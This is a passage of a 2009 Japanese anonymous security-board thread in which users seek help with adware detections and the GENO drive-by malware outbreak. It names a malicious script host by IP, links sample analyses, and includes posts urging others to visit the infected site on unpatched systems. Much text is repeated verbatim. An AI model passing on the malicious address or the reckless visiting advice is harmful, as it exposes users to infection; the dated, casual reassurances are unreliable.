2006年 2月上旬発売 IODATA NP-BBRL 最安値:\2,483 満足度3.27 6人 口コミ件数 774件
2007年 6月下旬発売 COREGA CG-BARFX3 最安値:\2,483 満足度2.43 3人 口コミ件数 73件
私見ですが"お店のお勧め"="良い製品"とは限りません。
"お店のお勧め"="捌きたい製品"のときもあります。
上記はバスターを批判しているわけではありません。すべての商品に対しての私見です。
最近のセキュリティソフトはそれなりにメモリを積んでいないと辛いです。
XPなら最低512Mはほしいですね。
ネットでの製品情報も(個人のブログ含め)さくらの書き込みがないとはいえないことも念頭に入れてください。
その上で価格コムの有線ルーター 満足度ランキング(10000円以下)を5位までかいておきます。
満足度5.00が満点
2004年 7月下旬発売 バッファロー BHR-4RV 最安値:\7,216 満足度4.72 採点人数5人 口コミ件数 347件
2007年 8月下旬発売 IODATA ETX-R 最安値:\2,370 満足度4.12 採点人数17人 口コミ件数 309件
2003年10月下旬発売 バッファロー BBR-4HG 最安値:\4,329 満足度3.58 9人 口コミ件数 3061件
2006年 2月上旬発売 IODATA NP-BBRL 最安値:\2,483 満足度3.27 6人 口コミ件数 774件
2007年 6月下旬発売 COREGA CG-BARFX3 最安値:\2,483 満足度2.43 3人 口コミ件数 73件
>>627様
丁寧に教えて頂きありがとうございます。
私などは量販店のオススメもパソコンと同時購入で1000円引きなど
これが売りたいんだなと伝わってきてもオススメを買って
しまう無知で いつまでも初心者なのです。
ルータも多分、満足度が高い評価のものを選んでしまうと思います。。。
早速、明日お店に行ってみます。
丁寧に教えて頂きありがとうございます。
私などは量販店のオススメもパソコンと同時購入で1000円引きなど
これが売りたいんだなと伝わってきてもオススメを買って
しまう無知で いつまでも初心者なのです。
ルータも多分、満足度が高い評価のものを選んでしまうと思います。。。
早速、明日お店に行ってみます。
661 :名無しさん@お腹いっぱい。:2009/04/03(金) 01:47:12
662 :名無しさん@お腹いっぱい。:2009/04/04(土) 13:44:53
http://www.geno-web.jp/
このページは安心ですか?
このページは安心ですか?
>>627様、教えていただいた皆様、ありがとうございました。
サービスパック3、バスターでスキャンできました。
リカバリディスク作成はこれからになります。
こちらで親切に教えて頂き本当に助かりました。
これからも質問される方のためにレスしていただけたらと思います。
私も少しずつですが自分でも勉強していこうと思います。
重ね重ねありがとうございました。
サービスパック3、バスターでスキャンできました。
リカバリディスク作成はこれからになります。
こちらで親切に教えて頂き本当に助かりました。
これからも質問される方のためにレスしていただけたらと思います。
私も少しずつですが自分でも勉強していこうと思います。
重ね重ねありがとうございました。
>>626
直ってよかったね。
PC使えないと情報収集が困難だからね。
数年前のバスターと今月のカスペは「祭り参加者」にならずにすんだけど…
カスペのはPC使用不能まではならないものの…あせるだろうな。
一歩間違えば被害当事者だ。 ベンダーさん、しっかりしてくれ〜
直ってよかったね。
PC使えないと情報収集が困難だからね。
数年前のバスターと今月のカスペは「祭り参加者」にならずにすんだけど…
カスペのはPC使用不能まではならないものの…あせるだろうな。
一歩間違えば被害当事者だ。 ベンダーさん、しっかりしてくれ〜
665 :名無しさん@お腹いっぱい。:2009/04/05(日) 16:09:13
こちらで質問するよう誘導されてきました。マルチではありません、よろしくお願いします。
【使用OS】 XP SP2
【Microsoft Update(MU)の状態】 有
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に更新しています
【スパイウェア対策ソフト】 スパイボット clam(非常駐)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に更新しています
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されたのはAdware memwatcherというものです
昨日インターネットを高速化しようと思い、InternetAcceleratorSPというフリーソフトをいれました。
するとウィルスバスター2009で検索したところ、スパイウェアは101個検出されました。
未解決の脅威の検出数101、処理数101です。
いつもは検出したらすぐ削除されるのですが、今回は全て隔離になっていました。
これは一体どうすればいいのでしょう?
最悪リカバリも覚悟していますが、InternetAcceleratorSPというフリーソフトというフリーソフト自体削除した方がいいのでしょうか?
窓の社などで紹介されていたので信用していたのですが・・
ちなみにもう一台のパソコンも検出数が全く同じ結果がでました。共通の行為としてはInternetAcceleratorSPというフリーソフトをいれたことだけです。
お分かりの方がいましたらどうか教えてください。お願いします。
あと全ての検出が終わった際、Adware memwatcherというものが1つ表示され削除か復元かを選ぶことになりました。
すぐに削除しましたが、これは解決したということなのでしょうか・・
【使用OS】 XP SP2
【Microsoft Update(MU)の状態】 有
【使用セキュリティソフトとバージョン】 ウィルスバスター2009
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 常に更新しています
【スパイウェア対策ソフト】 スパイボット clam(非常駐)
【スパイウェア対策ソフトの更新は定期的に行なっているか】 常に更新しています
【ルータの有無】 有
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
検出されたのはAdware memwatcherというものです
昨日インターネットを高速化しようと思い、InternetAcceleratorSPというフリーソフトをいれました。
するとウィルスバスター2009で検索したところ、スパイウェアは101個検出されました。
未解決の脅威の検出数101、処理数101です。
いつもは検出したらすぐ削除されるのですが、今回は全て隔離になっていました。
これは一体どうすればいいのでしょう?
最悪リカバリも覚悟していますが、InternetAcceleratorSPというフリーソフトというフリーソフト自体削除した方がいいのでしょうか?
窓の社などで紹介されていたので信用していたのですが・・
ちなみにもう一台のパソコンも検出数が全く同じ結果がでました。共通の行為としてはInternetAcceleratorSPというフリーソフトをいれたことだけです。
お分かりの方がいましたらどうか教えてください。お願いします。
あと全ての検出が終わった際、Adware memwatcherというものが1つ表示され削除か復元かを選ぶことになりました。
すぐに削除しましたが、これは解決したということなのでしょうか・・
666 :名無しさん@お腹いっぱい。:2009/04/05(日) 16:19:58
Adware memwatcher
広告の出るソフト使ってるんじゃないか?
検出名どおり、広告表示のアドウエアだったと思うざます。
トレンドも一応表示してるだけじゃないかな
http://www.trendmicro.co.jp/Vinfo/virusencyclo/default5.asp?VName=ADW%5FMEMWATCHER%2EB&VSect=P
広告の出るソフト使ってるんじゃないか?
検出名どおり、広告表示のアドウエアだったと思うざます。
トレンドも一応表示してるだけじゃないかな
http://www.trendmicro.co.jp/Vinfo/virusencyclo/default5.asp?VName=ADW%5FMEMWATCHER%2EB&VSect=P
667 :八頭 ◆YAGApwSaEw :2009/04/05(日) 16:27:18
>スパイウェアは101個検出されました
ダウンローダも同封されてたのかな?
ダウンローダも同封されてたのかな?
668 :665:2009/04/05(日) 16:32:31
>>666
もしかしたらそうかもしれません。ただ広告表示はこれまで出たことがないのでどういうものか分かりませんが・・
これから出るのでしょうか?できればあんまり関わりたくないです。
gooスピードテストなBNP スピードテストなど速度検索をするページへのリンクが機能の中にあるのでこれかもしれません。
製作者は安岡喜晴さんと明示してありますが、ホームページにハングルがあるので韓国製と考えたほうがいいかもしれません。
大陸のものはGOM PLAYERなど使っていたのであんまり抵抗がないかったのですが・・
気になっているのは隔離されました、と出るのに隔離ファイルに先ほど削除したものを除いて何も見当たらないことなんです
そういうものであれば別に問題ないのですが・・
ちなみに隔離ファイル名は全てC:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1です
もしかしたらそうかもしれません。ただ広告表示はこれまで出たことがないのでどういうものか分かりませんが・・
これから出るのでしょうか?できればあんまり関わりたくないです。
gooスピードテストなBNP スピードテストなど速度検索をするページへのリンクが機能の中にあるのでこれかもしれません。
製作者は安岡喜晴さんと明示してありますが、ホームページにハングルがあるので韓国製と考えたほうがいいかもしれません。
大陸のものはGOM PLAYERなど使っていたのであんまり抵抗がないかったのですが・・
気になっているのは隔離されました、と出るのに隔離ファイルに先ほど削除したものを除いて何も見当たらないことなんです
そういうものであれば別に問題ないのですが・・
ちなみに隔離ファイル名は全てC:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1です
669 :名無しさん@お腹いっぱい。:2009/04/05(日) 16:35:05
670 :665:2009/04/05(日) 16:35:19
>>667
作者サイトにてInternetAcceleratorSPSetup.msiとものを落としました。
速度測定サイトで紹介されていたので安心していましたが、これ自体がスパイウェアだったのでしょうか?
作者サイトにてInternetAcceleratorSPSetup.msiとものを落としました。
速度測定サイトで紹介されていたので安心していましたが、これ自体がスパイウェアだったのでしょうか?
671 :八頭 ◆YAGApwSaEw :2009/04/05(日) 16:41:00
恐いのはダウンローダ型が呼び寄せる多重感染だから
PCトラブル質問掲示板 へ相談して指示をもらうのがいいと思う
アメリカでもAdware memwatcherの感染例があった
PCトラブル質問掲示板 へ相談して指示をもらうのがいいと思う
アメリカでもAdware memwatcherの感染例があった
672 :名無しさん@お腹いっぱい。:2009/04/05(日) 16:49:19
アダ被で同質の感染例見つけたけど
バスタがきっちり処理してたらしい
まあ診てもらっても良いかも
バスタがきっちり処理してたらしい
まあ診てもらっても良いかも
674 :名無しさん@お腹いっぱい。:2009/04/05(日) 17:33:42
いや、質問が似てるってだけで内容は違うよ?
マルチと言ってるわけではないので、その辺は誤解なきよう…
ただバスタがやたら
[マルウエア名称] C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1
で検知してると思ったから、同じかなあと思っただけで
さて、晒していいものなのか判らんが・・・・
マルチと言ってるわけではないので、その辺は誤解なきよう…
ただバスタがやたら
[マルウエア名称] C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS 127.0.0.1
で検知してると思ったから、同じかなあと思っただけで
さて、晒していいものなのか判らんが・・・・
ちなみに感染マルウエアは同じ。
>>669
http://www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher
ここを見たところ
「Adware-MemWatcherはバックグラウンドで起動し、ユーザがInternet Explorerを開くのを待ちます。ユーザがInternet Explorerを開くと、広告を表示するウインドウを1つ以上表示します。 」
とあります。
つまりInternet Explorerを開いて問題なければ大丈夫ということでしょうか?
http://www.mcafee.com/japan/security/virA2003.asp?v=Adware-MemWatcher
ここを見たところ
「Adware-MemWatcherはバックグラウンドで起動し、ユーザがInternet Explorerを開くのを待ちます。ユーザがInternet Explorerを開くと、広告を表示するウインドウを1つ以上表示します。 」
とあります。
つまりInternet Explorerを開いて問題なければ大丈夫ということでしょうか?
677 :665:2009/04/05(日) 18:01:10
678 :名無しさん@お腹いっぱい。:2009/04/05(日) 18:15:01
679 :名無しさん@お腹いっぱい。:2009/04/05(日) 20:30:09
これ踏んでしまったのですが大丈夫でしょうか?
【注文0.1】Genoのサイトでウイルス感染…か?★2
http://tsushima.2ch.net/test/read.cgi/news/1238897231/
【注文0.1】Genoのサイトでウイルス感染…か?★2
http://tsushima.2ch.net/test/read.cgi/news/1238897231/
680 :名無しさん@お腹いっぱい。:2009/04/05(日) 20:40:14
ちょ、直貼りやめれ
681 :名無しさん@お腹いっぱい。:2009/04/05(日) 20:42:16
t"s"ushima か。。。。
682 :名無しさん@お腹いっぱい。:2009/04/05(日) 20:45:58
いや、別に問題ない
ニュー速板のリンク
ニュー速板のリンク
683 : ◆N9P3SuvBPo :2009/04/05(日) 21:36:19
>679
ざっと読んできたけど、2000とXPに限定されてるとあったからVistaなら大丈夫だとありましたね。
XPだとやられちゃうのか…よし踏んで来るか!!
ざっと読んできたけど、2000とXPに限定されてるとあったからVistaなら大丈夫だとありましたね。
XPだとやられちゃうのか…よし踏んで来るか!!
684 : ◆N9P3SuvBPo :2009/04/05(日) 21:46:55
今、その問題のサイトを表示してるんだけどなんにも起きません。
もしかして訂正された?
もしかして訂正された?
685 :名無しさん@お腹いっぱい。:2009/04/05(日) 21:57:52
いや、まだだと思うけど・・・
情報交換は本スレでしたほうが良いかもね。
情報交換は本スレでしたほうが良いかもね。
686 :名無しさん@お腹いっぱい。:2009/04/05(日) 22:06:02
>>684
AcrobatとFlash Playerの古いバージョン入れてIEのセキュを中以下にして再トライきぼんw
AcrobatとFlash Playerの古いバージョン入れてIEのセキュを中以下にして再トライきぼんw
687 : ◆N9P3SuvBPo :2009/04/05(日) 22:08:16
俺今な、そのgenoのトップやiframeで読み込まれるアンケートページ
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?
OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?
誰でも良い、仮想PC持ってる人いたら検証してくれ!!
問題の数字から始まるアドレスとかを、表示したけどみんなが言ってるようなことは起きませんぞ?
OSはWindowsXPSP2で、WindowsUpdateも購入時の状態からやってないし、
ウイルス対策ソフトも入れてないし、おまけにブラウザはIE6SP2だし、
この環境だと、誰がどう見ても間違い無く、そのページを開いて時点でフリーズして終了ってことですよね?
誰でも良い、仮想PC持ってる人いたら検証してくれ!!
688 : ◆N9P3SuvBPo :2009/04/05(日) 23:46:30
>>686
JavaScriptやActiveX無効にしてたのに、運悪く感染した人もいたそうで…
その人、俺と違って最低限WindowsのUpdateはしっかりとやってるだろうから、
この俺のパソコンよりセキュリティレベルは、比べ物にならないほど上だと思いますよ。
JavaScriptやActiveX無効にしてたのに、運悪く感染した人もいたそうで…
その人、俺と違って最低限WindowsのUpdateはしっかりとやってるだろうから、
この俺のパソコンよりセキュリティレベルは、比べ物にならないほど上だと思いますよ。
689 :名無しさん@お腹いっぱい。:2009/04/06(月) 00:15:56
>>688
再トライきぼんwは戯言だけど…、
他人がどうのではなく、実験機XPのAcrobatとFlash Playerの有無と有の場合のVer、
ブラウザのセキュリティ設定も書きこんだ上で結果を発表しないと…ここはセキュ板だもん。
再トライきぼんwは戯言だけど…、
他人がどうのではなく、実験機XPのAcrobatとFlash Playerの有無と有の場合のVer、
ブラウザのセキュリティ設定も書きこんだ上で結果を発表しないと…ここはセキュ板だもん。
690 :名無しさん@お腹いっぱい。:2009/04/06(月) 00:16:43
【使用OS】 Windows vista home
【Microsoft Update(MU)の状態】 有り
【使用セキュリティソフトとバージョン】 カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 スパイボット ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。
検知したものは「trojan-Downloader.JS.Agent.dwf」 URLは t t p : / / 94.247.2.195/jquery.js
経緯としては、研音(芸能事務所)のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
http://www.ken-on.co.jp/k-shop/2009/03/post_67.html
K-shopのトップページにも同じバナーはあります。
【Microsoft Update(MU)の状態】 有り
【使用セキュリティソフトとバージョン】 カスペルスキー7.0
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 されている
【スパイウェア対策ソフト】 スパイボット ADware
【スパイウェア対策ソフトの更新は定期的に行なっているか】 行っている
【ルータの有無】 有り
【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
ただいまスキャン中なのでスキャンの結果ではないのですが、あるHPに行こうとしたら
「脅威を検知しました」が出ました。
警告により拒否はしたのでレポート上では"安全になったオブジェクト"になっています。
検知したものは「trojan-Downloader.JS.Agent.dwf」 URLは t t p : / / 94.247.2.195/jquery.js
経緯としては、研音(芸能事務所)のK-shopというグッズ販売の水嶋ヒロさんのページのところから
菅野美穂さんがキイナで使ったネックレスというjuicyrockのバナーをクリックしたら検知が出ました。
誤検知なのか本当にトロイなのかわからないのですがいかがでしょうか。
http://www.ken-on.co.jp/k-shop/2009/03/post_67.html
K-shopのトップページにも同じバナーはあります。
691 :名無しさん@お腹いっぱい。:2009/04/06(月) 00:18:51
上の方で話題になってるGenoだね
692 : ◆N9P3SuvBPo :2009/04/06(月) 00:19:21
>689
Acrobatなし
Flashあり(最新版)
ブラウザIE(セキュリティ高)
アドオン無効
制限付きユーザー
Acrobatなし
Flashあり(最新版)
ブラウザIE(セキュリティ高)
アドオン無効
制限付きユーザー
693 : ◆N9P3SuvBPo :2009/04/06(月) 00:25:06
>690
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。
問題になってるgenoウイルスだね。
とりあえずカスペなら対応済みのようなので、念の為スキャンしてみましょう。
694 :名無しさん@お腹いっぱい。:2009/04/06(月) 00:34:32
>>690です。レスありがとうございます。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。
このページで買い物するつもりはないのですが残念な目にあってしまいましたorz
拒否が有効でなにも検出されなければ、他の安全なサイトでのショッピングなどは問題ないでしょうか。
たまに買い物はするので…。あと70%ほどのスキャンが終わったらまた参ります。
695 : ◆N9P3SuvBPo :2009/04/06(月) 00:56:59
>694
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。
WindowsUpdateとAcrobatとFlashが最新版なら大丈夫。
それでも心配ならリカバリするのが最も良い対策と言えるでしょう。
696 :名無しさん@お腹いっぱい。:2009/04/06(月) 01:12:33
>>695 JavaスクリプトONにしてアボート、94.247.2.195と通信していたら時既に手遅れ
697 :名無しさん@お腹いっぱい。:2009/04/06(月) 01:23:34
698 : ◆N9P3SuvBPo :2009/04/06(月) 01:24:10
>696
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。
94.247.2.195も踏んで来たけど、『Search the Web:』ってもしかしてCoolWebSearchなのか?
リアルタイムで検知して拒否したので、94.247.2.195とは通信してないと思われます。
94.247.2.195も踏んで来たけど、『Search the Web:』ってもしかしてCoolWebSearchなのか?
699 : ◆N9P3SuvBPo :2009/04/06(月) 01:27:59
>697
検出なし、了解です。
通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。
検出なし、了解です。
通信なら、スタート→検索欄に「cmd.exe」と入力してEnter
コマンドプロンプトの画面で、「netstat -an」と入力してEnter
94.247.2.195と通信してればアウト
たぶん大丈夫だと思いますが…。
700 :名無しさん@お腹いっぱい。:2009/04/06(月) 01:33:26
701 :名無しさん@お腹いっぱい。:2009/04/06(月) 01:44:07
>>690です。アドバイス感謝いたします。
コマンドプロンプトにて「netstat -an」を実行しました。
94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため(0時36分の出来事だったため)
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。
コマンドプロンプトにて「netstat -an」を実行しました。
94.247.2.195との通信履歴はありませんでした。実行すると"アクティブな接続"と表示されますが、
すでになんらかの通信が終わった後だったため(0時36分の出来事だったため)
に通信が表示されなかったということもあり得るのでしょうか。
考えなくてよいのならば、その後の詳細の発表を待ちたいと思います。
702 : ◆N9P3SuvBPo :2009/04/06(月) 01:53:47
>701
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。
ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。
じゃあ、今はとりあえず様子見…後日KVRTを使ってチェックしてみるとか。
ちなみに、タスクマネージャにconime.exeがあったらアウトってレスがあると思いますが、
コマンドプロンプトを起動させれば、自動的にconime.exeも起動するようになってますので。
またコマンドプロンプトを閉じても、conime.exeが残るのは使用ですから。
703 :名無しさん@お腹いっぱい。:2009/04/06(月) 02:12:59
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか?
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜…有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
ソフトに関係するレジストリも削除済みです。
何か、ウィルスやその他の脅威の可能性はありますでしょうか?
704 :名無しさん@お腹いっぱい。:2009/04/06(月) 06:30:51
951 名前:名無しさん[sage] 投稿日:2009/04/06(月) 01:34:39 0
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜?有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。
OSはVistaです。
システムのプロパティを開いて、詳細設定タブを開き、パフォーマンスの設定を開き、
パフォーマンスオプションのデータ実行防止タブを開くと、選択するウィンドウが出ます。
『次に選択するのものを除く〜?有効にする』を選択すると、アンインストールしたソフトの項目がありました。
これを何回削除しても、復活しちゃうんです。。ちなみにDVDFabというソフトです。。
関係するレジストリも削除済みです。
この項目が出ないようにする方法知ってる方いたら、教えて下さい。
何回やっても出てきて気持ち悪くて。。
705 :名無しさん@お腹いっぱい。:2009/04/06(月) 21:07:46
Vista 一般ユーザー(管理者権限は持ってない)
IE7 保護モード
これでだいたいの奴は踏んでも怖くない
IE7 保護モード
これでだいたいの奴は踏んでも怖くない
706 :名無しさん@お腹いっぱい。:2009/04/06(月) 21:44:04
Windows Updateとウィルス定義を最新にしとけば大丈夫なんじゃないの?
「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず,
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染,システムが
利用不能に。Windows Update+ウイルス対策ソフトでは対策にならない例。」
どうして対策できなかったの?
「ウイルス対策ソフトのパターンファイルが最新であったにもかかわらず,
職員のWeb閲覧でPE_MUMAWOW.AJ-Oに感染,システムが
利用不能に。Windows Update+ウイルス対策ソフトでは対策にならない例。」
どうして対策できなかったの?
707 :名無しさん@お腹いっぱい。:2009/04/06(月) 23:50:31
>>706
>Windows Update
Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった
>ウイルス対策ソフト
ウイルス対策ソフトがまだ対応していないウイルスだった
>Windows Update
Windows の脆弱性をつく攻撃ではなかった
もしくは
ゼロデイ攻撃が行われており、まだパッチがなかった
>ウイルス対策ソフト
ウイルス対策ソフトがまだ対応していないウイルスだった
708 :名無しさん@お腹いっぱい。:2009/04/07(火) 00:33:08
教えてください。
avastをインスコ バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン 090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず
これで一応は GENOウィルス大丈夫ってことで良いのでしょうか????????
【使用OS】 「windows xp sp3」
【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】 「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「したつもり」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「あり」
【スキャンの結果】 「何も検出されず」」
これからMicrosoft Update試みてみます。
avastをインスコ バージョン4.8.1335.0
手動でUPDATEして
VPSの現在のバージョン 090406-0、04/06
この状態でスキャン完了。50分くらいかかったが何も検出されず
これで一応は GENOウィルス大丈夫ってことで良いのでしょうか????????
【使用OS】 「windows xp sp3」
【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
【使用セキュリティソフトとバージョン】 「zone alarm」 「avast」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「したつもり」
【スパイウェア対策ソフト】 「無し」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「無し」
【ルータの有無】 「あり」
【スキャンの結果】 「何も検出されず」」
これからMicrosoft Update試みてみます。
709 :名無しさん@お腹いっぱい。:2009/04/07(火) 00:45:37
0-day攻撃でやられた、もしくはパッチ未適用でやられた場合でも大丈夫なように、
Vista+IE7で、保護モード使ってるな
Vista+IE7で、保護モード使ってるな
710 : ◆N9P3SuvBPo :2009/04/07(火) 00:50:26
>708
GENOウイルス関連サイト踏んだの?
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか?
GENOウイルス関連サイト踏んだの?
geno-webに飛ばす短縮URLを間違えてクリックしてしまったとか?
711 :名無しさん@お腹いっぱい。:2009/04/07(火) 01:02:03
>>710
はい、SDカード欲しくて、色んなサイト物色してたもんで
思いっきりGENO本体見てましたorz....
何時見たのかが記憶にないので
色々不安になってしまいまして
検出されなけれ大丈夫ですよねぇ??
はい、SDカード欲しくて、色んなサイト物色してたもんで
思いっきりGENO本体見てましたorz....
何時見たのかが記憶にないので
色々不安になってしまいまして
検出されなけれ大丈夫ですよねぇ??
712 :名無しさん@お腹いっぱい。:2009/04/07(火) 01:04:33
ひとつ気になるのはこれを踏んだあとか前かはわからんがアマゾンでクレカ決済しているんだよなあ・・・
httpsって飾りですかね。
httpsって飾りですかね。
713 : ◆N9P3SuvBPo :2009/04/07(火) 01:11:10
>711
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。
いや、あなた質問する時にこう言いましたよね?
>【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。
MicrosoftUpdateできました?
そういう時は履歴を見れば良いんですよ。
該当するサイト名を右クリック→プロパティ
最終表示日時を見れば、いつ踏んだか分かりますので。
いや、あなた質問する時にこう言いましたよね?
>【Microsoft Update(MU)の状態】 「不明」 ←試みたが繋がらなかった
って
何度試しても時間を置いて試してもそれでも繋がらない、となると可能性はあります。
MicrosoftUpdateできました?
714 :名無しさん@お腹いっぱい。:2009/04/07(火) 01:24:14
>>713
firefoxで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか???
マジMicrosoft Updateが繋がりませんしたorz
なんかもう疲れたんでorz
当該PCは電源落として明日また挑戦してみます
firefoxで見てたんですが
なんか調子悪いんで真っ先にアンインストールしてしまってて・・・・
履歴って残ってるもんなんでしょうか???
マジMicrosoft Updateが繋がりませんしたorz
なんかもう疲れたんでorz
当該PCは電源落として明日また挑戦してみます
715 :名無しさん@お腹いっぱい。:2009/04/07(火) 01:27:51
>>714
UpdateはIEでやるべきじゃね?
UpdateはIEでやるべきじゃね?
716 : ◆N9P3SuvBPo :2009/04/07(火) 01:29:39
>714
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。
電源落す前に、HijackThisのログをどこかのうpろだへ“パス付きで”上げて貰えないでしょうか?
俺Firefox使ってないから断定はできないけど、消えちゃうんじゃないでしょうか…。
電源落す前に、HijackThisのログをどこかのうpろだへ“パス付きで”上げて貰えないでしょうか?
717 :八頭 ◆YAGApwSaEw :2009/04/07(火) 01:54:45
>>708と◆N9P3SuvBPo
・Winコントロールパネル>管理ツール>サービス
>「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認(駆除後も確認必要)
・Winコントロールパネル>セキュリティセンターの「自動更新」も確認(駆除後も確認必要)
Genoのウイルスはコレ
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a
File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L
「a-squared Free 4.0」 をダウンロード
ttp://www.emsisoft.jp/jp/software/free/
>手動Updateする
>「ディープスキャン」を選択実行して検出を試みる、
(※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく)>a-squared Freeでそのまま駆除
・Winコントロールパネル>管理ツール>サービス
>「Avast関連のサービス」と「Automatic Updates」がちゃんと動いてるかを確認(駆除後も確認必要)
・Winコントロールパネル>セキュリティセンターの「自動更新」も確認(駆除後も確認必要)
Genoのウイルスはコレ
ttp://www.virustotal.com/analisis/48cfd289b06a1fb46dfbcb9fc8bad17a
File 8lv.exe received on 04.03.2009 18:36:21 (CET)
Avast ・・・ Win32:Daonol-L
「a-squared Free 4.0」 をダウンロード
ttp://www.emsisoft.jp/jp/software/free/
>手動Updateする
>「ディープスキャン」を選択実行して検出を試みる、
(※スキャン終了後に「ログ保存」にボタンをクリックして都合のいい場所にテキスト保存、
あとでAvastへ提出しておく)>a-squared Freeでそのまま駆除
718 :八頭 ◆YAGApwSaEw :2009/04/07(火) 02:05:51
複数仕掛けられてた模様・・・
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう
GENOなどのサイトでウイルス感染★6
GmL.exe 受理 2009.04.06 18:04:43 (CET)
ttp://www.virustotal.com/jp/analisis/d2ab3fb2e35d6cc5aaae32e7230a4646
La.zip 受理 2009.04.06 18:32:46 (CET)
ttp://www.virustotal.com/jp/analisis/3dda094319cd06b1fc0175bdaf516e44
パックされたDropper型、McAfeeやSymantecは対応済みらしい
このサイト踏みたくなかったんで、Symantecへは別件提出しといたから対応してくれたんだろう
GENOなどのサイトでウイルス感染★6
